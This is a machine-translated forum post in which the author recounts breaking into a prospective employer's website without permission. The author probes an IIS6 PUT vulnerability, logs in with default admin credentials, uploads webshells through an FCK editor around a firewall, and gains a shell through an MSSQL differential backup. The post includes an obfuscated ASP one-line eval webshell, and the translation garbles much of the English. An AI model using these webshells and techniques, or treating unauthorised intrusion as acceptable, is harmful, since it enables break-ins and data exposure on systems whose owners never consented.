Remember a difficult and Abnormal Intrusion (mainly based on ideas)

Four days ago, a company called me for an interview. So I looked at the company's website and wanted to check the security. I found that the whole site is flash. I used Google site for half a day and couldn't show what type of language it was. (I finally found it was html) I couldn't help either. I went directly to JSKY, one scan found the IIS6 put Vulnerability (which has been fixed and not saved). This vulnerability has become very old and often occurred on IIS5 before, but can be found now, that is, the character explosion, thinking that the character is good, but wait and you will know how sad. Directly upload test.txt to notify you of success. Then, move to indicate success. Then, you are excited. Visit 404.

After a while, I went on to look at it and try again. Upload files, but how to manually test the upload is not good, I am thinking it must be blocked by the firewall.

I was wondering why the tool could be used, but it could not be used manually. Baidu once saw an article by Lao Jun, "IIS write permission reuse", which mentioned an environment problem, specifically, you can submit data packets using NC on Baidu. However, after the test, the solution still fails, and you do not know whether it is a technical problem or a method problem. (I still haven't solved the problem yet, but I think it should be a problem with the wall.) instead, I sent a question to 3est. The village chief uploaded the txt file and didn't find that he provided the asp path. This problem has been fixed in 3est. So I decided to change my mind.
Scan to find that all the programs on the server are the same as one cms. Net Program, and the background is similar to the background of phpcms2008, how is this good? This is a set of programs developed by them. There is no idea for zero day, and there is no way to do it. If there is a password, there is no password for most of the sites, and the character suddenly breaks out, the default value is admin. Haha, let's go back to the peak again, and then start to do it, find the upload, find a fck editor for half a day, and use the fck editor to see Jacks online, and then send it to him, after Continuous testing, No Trojans can be uploaded, and they are intercepted by the firewall.
<% @ LANGUAGE = "JAVASCRIPT" CODEPAGE = "65001" %>
<%
Var lcx = {'name': Request. form ('#'), 'Gender ': eval, 'age': '18', 'nickname': 'Please call me the boss '};
Lcx. Gender (lcx. Name) + '');
%>
 

Merged into an image

I have never played this trojan before. I found that it was not connected with a kitchen knife, and the prompt was 500. Later I found that it was not connected with a kitchen knife. This was to be linked with a client using ice fox, finally, I also tested whether to use the link of a client using ice Fox to send a message indicating an error. It's speechless. Let's change your mind.
I saw a soo upload tool before entering the background, but it has never been used. This will test the tool and upload the asp file directly, prompting that it is successful. The path cannot be found. Unfortunately, I had no choice but to use the packet capture tool. I was prepared to be discouraged when I failed to find the path. But I was not discouraged when I thought about it. I published this article directly to the front-end to see if there were any paths. As I did not expect, the path of the Trojan can be found at the front end, but the access is still 404. it's a tragedy. Why? It must have been blocked by the firewall or killed by the software. If we tried N of them, it would have been 404. This is a tragedy. At this time, I suddenly thought of the editor. I guess again.
 

Here I am using editone. asp. This is a normal editor, and the firewall is over. Haha.
Log in directly and get such a poor permission. Then upload the Trojan horse in the editor, and upload all kinds of Trojans in one sentence. It's really an abnormal wall. I thought about it. I thought of the webadmin 2. y of lake2. I decided to go to the official website.
 

The space has expired, but Baidu has no choice but to look for it. When something happened at that time, I first went out and put down this idea.
In the afternoon, I sent this question to the Group for discussion. jacks gave me a thought, and the net program could consider MSSQL differential backup. Right. Why didn't you think of this. Ah, I have been struggling to upload and write files. All ideas are blocked. It seems that I have to ask Daniel for advice. Log on to the editor and create a new 1. php file. Then click open. The error "www.2cto.com" is returned.
Get path
 
Shell is the result of differential backup. It is an asp sentence.
 

However, the permissions are quite large, and the entire server can be browsed. It seems that security is not doing very well.
I really want to despise them. At that time, the interview also asked me how to set up permissions. It seems that the interviewer is half-hanging. I can tell you one week after the interview. It seems that it is a blow and there is no phone number. He Mei's
Then I found the main site, guessed it, and found the path of the main site. Directly the last txt flash ..


At this point, the intrusion has ended. After reading the ws component deletion, the sa has been downgraded, so the Elevation of Privilege will not be involved. When will the sa be free.
This article has no technical content, and is a popular practice. I think the idea is especially important. I hope this article will help you.

Source: Root Security Team http://root-sec.org/thread-501-1-1.html